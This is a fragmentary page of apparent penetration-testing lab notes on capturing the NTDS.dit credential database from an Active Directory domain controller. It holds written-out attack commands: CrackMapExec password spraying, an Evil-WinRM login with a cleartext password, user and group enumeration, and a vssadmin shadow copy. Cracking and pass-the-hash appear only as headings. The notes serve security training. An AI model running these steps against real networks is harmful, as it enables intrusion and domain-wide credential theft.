Active Directory and NTDS.dit
Username Anarchy
./username-anarchy -i /home/ltnbob/names.txt Attacking with CrackMapExec
$ crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txtCapturing NTDS.dit
Connecting to the DC using Evil-WinRM
$ evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'Checking Local Group Membership
*Evil-WinRM* PS C:\> net localgroupChecking User Account Privileges including Domain
*Evil-WinRM* PS C:\> net user bwilliamsonCreating Shadow Copy of C
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:Copying NTDS.dit from the VSS
Transferring NTDS.dit to the Attack Host
Using CrackMapExec to capture NTDS.dit
Cracking Hashes and Gaining Credentials
Pass-the-Hash using Evil-WinRM
Last updated